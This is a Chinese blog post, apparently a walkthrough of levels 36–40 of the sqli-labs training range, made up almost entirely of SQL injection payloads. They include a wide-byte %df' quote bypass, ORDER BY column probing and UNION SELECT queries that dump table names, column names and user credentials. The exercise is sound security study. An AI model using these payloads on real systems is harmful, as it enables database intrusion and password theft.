sql-labs靶场36-40关

最新推荐文章于 2024-09-02 07:02:10 发布

谪仙123

最新推荐文章于 2024-09-02 07:02:10 发布

阅读量934

点赞数 28

文章标签： sql 数据库 mysql

本文链接：https://blog.csdn.net/2301_78031880/article/details/141607587

版权

三十六.less=36

1.使用?id=1/进行测试

2.猜测字段

?id=1%df' order by 4--+

3.没第四列，我们看一下第三列

?id=1%df' order by 3--+

4.爆破表名

?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

5.爆出列名

?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x656D61696C73--+

6.爆破数据

?id=-1%df' union select 1,group_concat(id,username,0x3a,password),3 from users--+

三十七.less=37

1.先抓包，然后猜测字段

uname=1%df' order by 3#&passwd=1&submit=Submit

2.查看表名

uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit

3.爆破列名

uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73#&passwd=1&submit=Submit

4.爆破数据

uname=-1%df' union select 1,group_concat(id,0x3a,email_id) from emails#&passwd=1&submit=Submit

三十八.less=38

1.单引号闭合-1' union select 1,2,3--+

2.查询数据库名称

-1' union select 1,2,database()--+

3.查询表名

-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

4.查询列名

-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') --+

5.查询数据

-1' union select 1,2,(select group_concat(username,'~',password) from security.users) --+

三十九.less=38

1.测试?id=-1 union select 1,2,3--+

2.查询数据库名称

?id=-1 union select 1,2,database()--+

3.查看表名

?id=-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

4.查看列名

?id=-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') --+

5.查询数据

?id=-1 union select 1,2,(select group_concat(username,'~',password) from security.users)--+

四十.less=40

1.

?id=-1') union select 1,2,3--+单引号加括号闭合

2.查询数据库名称

?id=-1') union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

3.查询列名

?id=-1') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') --+

4.查询数据

?id=-1') union select 1,2,(select group_concat(username,'~',password) from security.users)--+

谪仙123

关注

28
点赞
踩
9

收藏

觉得还不错? 一键收藏
0
评论
sql-labs靶场36-40关

?id=1%df' order by 4--+?id=1%df' order by 3--+?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where t
复制链接

扫一扫